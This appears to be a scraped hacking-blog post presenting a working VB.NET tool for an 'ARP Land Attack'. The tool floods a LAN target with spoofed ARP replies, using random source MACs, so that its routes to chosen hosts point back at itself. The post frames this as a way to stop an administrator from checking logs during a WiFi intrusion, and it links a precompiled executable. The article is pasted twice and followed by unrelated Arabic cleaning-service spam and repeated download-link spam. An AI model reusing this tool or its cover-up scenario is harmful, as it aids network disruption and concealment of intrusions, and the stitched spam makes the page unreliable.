ARP Land Attack
Yeah, you know the deal.
Another network-based attack! This time, a LAND-attack (Local Area Network Denial – attack).
I know the first thing that comes to your mind is:
I’ve actually found this quite useful.
It requires a very small amount of packets to null-route a remote computer (remote; as in, a computer on the LAN you don’t have physical access to).
Imagine this scenario:
…the administrator is unable to access the logs?
…because his ARP-cache tells him the remote logs is on his local computer?
Whose paranoid then?
This is a PoC of how you can poison the evil-administrators routes to critical systems (the systems you’re after?); back to himself.
001 Imports nokitel.PCAP 'Make sure your project is running .NET 3.5; and add a reference to nokitel.dll.
002 Module ARP_Land_Attack
003 Private NIC As Adapters.Adapter = Nothing 'The NIC you will send from.
004 Private Adapters As New Adapters 'An instance of the NIC-enumuration.
005 Private TargetMAC As String 'Targets MAC-address.
006 Private TargetIP As Net.IPAddress 'Targets IPv4-address.
007 Private NullRoutes As New ArrayList 'List of addresses to disable.
008 Private Structure Route
009 Dim IP As Net.IPAddress
010 Dim MAC As String
011 End Structure
012 Sub Main()
013 ShowNICs()
014 ChooseNIC()
015 ChooseTarget() 'Who will we attack?
016 MakeNullroutes() 'What routes should we attack?
017 Nullroute() 'Attack!
018 End Sub
019 Private Sub ChooseTarget()
020 Dim Dummy As String = vbNullString
021 Do
022 Console.WriteLine()
023 Console.WriteLine("< Enter the targets IPv4:") Console.Write("> ")
024 Dummy = Console.ReadLine
025 Loop Until nokitel.Format.IsIPv4(Dummy)
026 TargetMAC = nokitel.Parse.ARP.GetMAC(Dummy, NIC.IP)
027 TargetIP = nokitel.Format.StringToIPAddress(Dummy)
028 End Sub
029 Private Sub MakeNullroutes()
030 Dim Dummy As String = vbNullString
031 Dim ExitSub As Boolean = False
032 Console.WriteLine()
033 Console.WriteLine("< Write ""start"" to poison the target.")
034 Do
035 Do
036 Console.WriteLine("< Enter an IPv4 to nullroute:") Console.Write("> ")
037 Dummy = Console.ReadLine
038 If Not String.IsNullOrEmpty(Dummy) Then
039 If nokitel.Format.RegexMatch(Dummy, "launch|start|attack|destroy|poison|kill|exterminate") Then
040 ExitSub = True
041 Exit Do
042 End If
043 End If
044 Loop Until nokitel.Format.IsIPv4(Dummy)
045 If ExitSub Then
046 If NullRoutes.Count > &H0 Then
047 Exit Do
048 Else
049 Console.WriteLine("! Enter atleast one route to poison.")
050 ExitSub = Not ExitSub
051 End If
052 Else
053 Dim Entry As New Route
054 With Entry
055 .IP = nokitel.Format.StringToIPAddress(Dummy) 'The IP-address to poison
056 .MAC = nokitel.Parse.ARP.GetMAC(.IP.ToString, NIC.IP) 'The corresponding MAC-address attached to the IP.
057 If String.IsNullOrEmpty(.MAC) Then .MAC = "00:00:00:00:00:00" 'If the ARP-request fails, we simply make a "blackhole".
058 End With
059 NullRoutes.Add(Entry) 'Add the route to the stack.
060 End If
061 Loop
062 Console.WriteLine()
063 End Sub
064 Private Sub Nullroute()
065 Dim Ethernet As New nokitel.Parse.Ethernet.Ethernet
066 Dim ARP As New nokitel.Parse.ARP.ARP
067 Dim Payload(nokitel.Parse.ARP.OFFSET) As Byte
068 Do
069 For Each Route As Route In NullRoutes
070 With Ethernet
071 .DestinationMAC = TargetMAC
072 .SourceMAC = nokitel.Format.RandomMAC 'Spoof that it's not us. Who knows?
073 .Type = nokitel.Parse.Ethernet.Ethernet_Types.ARP
074 End With
075 With ARP
076 .HardwareType = nokitel.Parse.ARP.HardwareType.Ethernet
077 .Operation = nokitel.Parse.ARP.OPCODES.Reply
078 .ProtocolAddressLength = &H4 'IPv4 Length (4 bytes).
079 .HardwareAddressLength = &H6 'MAC-address Length (6 bytes).
080 .ProtocolType = nokitel.Parse.ARP.ProtocolType.IP
081 .SenderHardwareAddress = TargetMAC 'Set the route's IP to the targets own MAC-address.
082 .SenderProtocolAddress = nokitel.Format.StringToIPAddress(Route.IP.ToString)
083 .TargetHardwareAddress = Route.MAC
084 .TargetProtocolAddress = nokitel.Format.StringToIPAddress(Route.IP.ToString)
085 Console.WriteLine("Poisoning " & TargetIP.ToString & "'s ARP-Cache ### " & Route.IP.ToString & " -=> " & TargetMAC)
086 End With
087 nokitel.Parse.Ethernet.Make(Payload, Ethernet) 'Grab the structures and convert them to raw-bytes.
088 nokitel.Parse.ARP.Make(Payload, ARP)
089 NIC.Send(Payload) 'Send the bogus packets!
090 Next
091 System.Threading.Thread.Sleep(2000) 'Sleep for a while, we don't need to be quick.
092 Loop
093 End Sub
094 Private Sub ShowNICs()
095 For Index As Integer = &H0 To Adapters.Enumurate.Length - &H1 'Loop through all available NIC's, and display their stats:
096 With Adapters.Enumurate(Index)
097 Console.WriteLine("* ID: " & Index)
098 Console.WriteLine("* Name: " & .Name)
099 Console.WriteLine("* Description: " & .Description)
100 Console.WriteLine("* GUID: " & .GUID)
101 Console.WriteLine("* Netmask: " & .Netmask)
102 Console.WriteLine("* Destination: " & .DestinationAddress)
103 Console.WriteLine("* Broadcast: " & .BroadcastAddress)
104 Console.WriteLine("* IP: " & .IP)
105 Console.WriteLine("* MAC: " & .MAC)
106 Console.WriteLine("* Gateway IP: " & .GatewayIP)
107 Console.WriteLine("* Gateway MAC: " & .GatewayMAC)
108 Console.WriteLine("* Supports WiFi: " & CStr(If(.IsWIFI, "Yes", "No")) & ".")
109 End With
110 Console.WriteLine()
111 Next
112 End Sub
113 Private Sub ChooseNIC()
114 Dim ID As String = vbNullString
115 Do
116 Console.Write("> ")
117 ID = Console.ReadLine
118 If IsNumeric(ID) Then
119 If ID >= &H0 And ID < Adapters.Enumurate.Length Then
120 NIC = Adapters.Enumurate(ID) 'Set the NIC-variable to the corresponding index from the "ShowNICs()" output.
121 If Not NIC.Open(, False) Then
122 Console.WriteLine("x Unable to hook device!")
123 End
124 End If
125 Exit Do
126 End If
127 End If
128 Loop
129 End Sub
130 End Module
Yeah, the code is a bit long. Sorry for that.
But I hope you understand the scenario.
Note: His ARP-Cache get restored almost instantly after you quit the attack. So no real harm done.
A pre-compiled Win32 executable can be downloaded from here.
And here’s a screenshot of how I nullified my laptop:
source:h.ackack
Another network-based attack! This time, a LAND-attack (Local Area Network Denial – attack).
I know the first thing that comes to your mind is:
“LAME. With a MITM (Man-in-the-Middle), you can at least steal data, with this you simply DoS someone…”Not so fast.
I’ve actually found this quite useful.
It requires a very small amount of packets to null-route a remote computer (remote; as in, a computer on the LAN you don’t have physical access to).
Imagine this scenario:
- You found an encrypted WiFi-network.
- You cracked it.
- You got it in and started MITM’ing.
- However! The administrator notices, and starts checking the logs.
- What to do?!
- You get paranoid and stop.
…the administrator is unable to access the logs?
…because his ARP-cache tells him the remote logs is on his local computer?
Whose paranoid then?
This is a PoC of how you can poison the evil-administrators routes to critical systems (the systems you’re after?); back to himself.
001 Imports nokitel.PCAP 'Make sure your project is running .NET 3.5; and add a reference to nokitel.dll.
002 Module ARP_Land_Attack
003 Private NIC As Adapters.Adapter = Nothing 'The NIC you will send from.
004 Private Adapters As New Adapters 'An instance of the NIC-enumuration.
005 Private TargetMAC As String 'Targets MAC-address.
006 Private TargetIP As Net.IPAddress 'Targets IPv4-address.
007 Private NullRoutes As New ArrayList 'List of addresses to disable.
008 Private Structure Route
009 Dim IP As Net.IPAddress
010 Dim MAC As String
011 End Structure
012 Sub Main()
013 ShowNICs()
014 ChooseNIC()
015 ChooseTarget() 'Who will we attack?
016 MakeNullroutes() 'What routes should we attack?
017 Nullroute() 'Attack!
018 End Sub
019 Private Sub ChooseTarget()
020 Dim Dummy As String = vbNullString
021 Do
022 Console.WriteLine()
023 Console.WriteLine("< Enter the targets IPv4:") Console.Write("> ")
024 Dummy = Console.ReadLine
025 Loop Until nokitel.Format.IsIPv4(Dummy)
026 TargetMAC = nokitel.Parse.ARP.GetMAC(Dummy, NIC.IP)
027 TargetIP = nokitel.Format.StringToIPAddress(Dummy)
028 End Sub
029 Private Sub MakeNullroutes()
030 Dim Dummy As String = vbNullString
031 Dim ExitSub As Boolean = False
032 Console.WriteLine()
033 Console.WriteLine("< Write ""start"" to poison the target.")
034 Do
035 Do
036 Console.WriteLine("< Enter an IPv4 to nullroute:") Console.Write("> ")
037 Dummy = Console.ReadLine
038 If Not String.IsNullOrEmpty(Dummy) Then
039 If nokitel.Format.RegexMatch(Dummy, "launch|start|attack|destroy|poison|kill|exterminate") Then
040 ExitSub = True
041 Exit Do
042 End If
043 End If
044 Loop Until nokitel.Format.IsIPv4(Dummy)
045 If ExitSub Then
046 If NullRoutes.Count > &H0 Then
047 Exit Do
048 Else
049 Console.WriteLine("! Enter atleast one route to poison.")
050 ExitSub = Not ExitSub
051 End If
052 Else
053 Dim Entry As New Route
054 With Entry
055 .IP = nokitel.Format.StringToIPAddress(Dummy) 'The IP-address to poison
056 .MAC = nokitel.Parse.ARP.GetMAC(.IP.ToString, NIC.IP) 'The corresponding MAC-address attached to the IP.
057 If String.IsNullOrEmpty(.MAC) Then .MAC = "00:00:00:00:00:00" 'If the ARP-request fails, we simply make a "blackhole".
058 End With
059 NullRoutes.Add(Entry) 'Add the route to the stack.
060 End If
061 Loop
062 Console.WriteLine()
063 End Sub
064 Private Sub Nullroute()
065 Dim Ethernet As New nokitel.Parse.Ethernet.Ethernet
066 Dim ARP As New nokitel.Parse.ARP.ARP
067 Dim Payload(nokitel.Parse.ARP.OFFSET) As Byte
068 Do
069 For Each Route As Route In NullRoutes
070 With Ethernet
071 .DestinationMAC = TargetMAC
072 .SourceMAC = nokitel.Format.RandomMAC 'Spoof that it's not us. Who knows?
073 .Type = nokitel.Parse.Ethernet.Ethernet_Types.ARP
074 End With
075 With ARP
076 .HardwareType = nokitel.Parse.ARP.HardwareType.Ethernet
077 .Operation = nokitel.Parse.ARP.OPCODES.Reply
078 .ProtocolAddressLength = &H4 'IPv4 Length (4 bytes).
079 .HardwareAddressLength = &H6 'MAC-address Length (6 bytes).
080 .ProtocolType = nokitel.Parse.ARP.ProtocolType.IP
081 .SenderHardwareAddress = TargetMAC 'Set the route's IP to the targets own MAC-address.
082 .SenderProtocolAddress = nokitel.Format.StringToIPAddress(Route.IP.ToString)
083 .TargetHardwareAddress = Route.MAC
084 .TargetProtocolAddress = nokitel.Format.StringToIPAddress(Route.IP.ToString)
085 Console.WriteLine("Poisoning " & TargetIP.ToString & "'s ARP-Cache ### " & Route.IP.ToString & " -=> " & TargetMAC)
086 End With
087 nokitel.Parse.Ethernet.Make(Payload, Ethernet) 'Grab the structures and convert them to raw-bytes.
088 nokitel.Parse.ARP.Make(Payload, ARP)
089 NIC.Send(Payload) 'Send the bogus packets!
090 Next
091 System.Threading.Thread.Sleep(2000) 'Sleep for a while, we don't need to be quick.
092 Loop
093 End Sub
094 Private Sub ShowNICs()
095 For Index As Integer = &H0 To Adapters.Enumurate.Length - &H1 'Loop through all available NIC's, and display their stats:
096 With Adapters.Enumurate(Index)
097 Console.WriteLine("* ID: " & Index)
098 Console.WriteLine("* Name: " & .Name)
099 Console.WriteLine("* Description: " & .Description)
100 Console.WriteLine("* GUID: " & .GUID)
101 Console.WriteLine("* Netmask: " & .Netmask)
102 Console.WriteLine("* Destination: " & .DestinationAddress)
103 Console.WriteLine("* Broadcast: " & .BroadcastAddress)
104 Console.WriteLine("* IP: " & .IP)
105 Console.WriteLine("* MAC: " & .MAC)
106 Console.WriteLine("* Gateway IP: " & .GatewayIP)
107 Console.WriteLine("* Gateway MAC: " & .GatewayMAC)
108 Console.WriteLine("* Supports WiFi: " & CStr(If(.IsWIFI, "Yes", "No")) & ".")
109 End With
110 Console.WriteLine()
111 Next
112 End Sub
113 Private Sub ChooseNIC()
114 Dim ID As String = vbNullString
115 Do
116 Console.Write("> ")
117 ID = Console.ReadLine
118 If IsNumeric(ID) Then
119 If ID >= &H0 And ID < Adapters.Enumurate.Length Then
120 NIC = Adapters.Enumurate(ID) 'Set the NIC-variable to the corresponding index from the "ShowNICs()" output.
121 If Not NIC.Open(, False) Then
122 Console.WriteLine("x Unable to hook device!")
123 End
124 End If
125 Exit Do
126 End If
127 End If
128 Loop
129 End Sub
130 End Module
Yeah, the code is a bit long. Sorry for that.
But I hope you understand the scenario.
Note: His ARP-Cache get restored almost instantly after you quit the attack. So no real harm done.
A pre-compiled Win32 executable can be downloaded from here.
And here’s a screenshot of how I nullified my laptop:
source:h.ackack
Category Article Hacking
وبعد ذلك نقدم لكم خدمات تنظيف خزانات المياه في منطقة مكة المكرمة مثل الطائف ومكة وجدة وهي من الخدمات المهمة وتتمثل في تلك الشركات التي تعمل في مجال تنظيف الخزانات بجدة وتقدم خدمات جيدة ورائعة في غسيل الخزانات وتعقيم خزان الماء من الداخل وذلك لأن فريق افضل شركه تنظيف خزانات بجده بارعين ومتخصصين في تلك الأعمال ولديهم كل الطرق والمواد اللازمة والجيدة لتنظيف خزانات المياه لأن خدمات شركات تنظيف الخزانات بجدة مهمة وضرورية ولها اهمية خاصة من قبل شركة تنظيف خزانات بجدة فيتم عملية تنظيف الخزانات بطرق احترافية وآمنة
Arp Land Attack >>>>> Download Now
>>>>> Download Full
Arp Land Attack >>>>> Download LINK
>>>>> Download Now
Arp Land Attack >>>>> Download Full
>>>>> Download LINK jb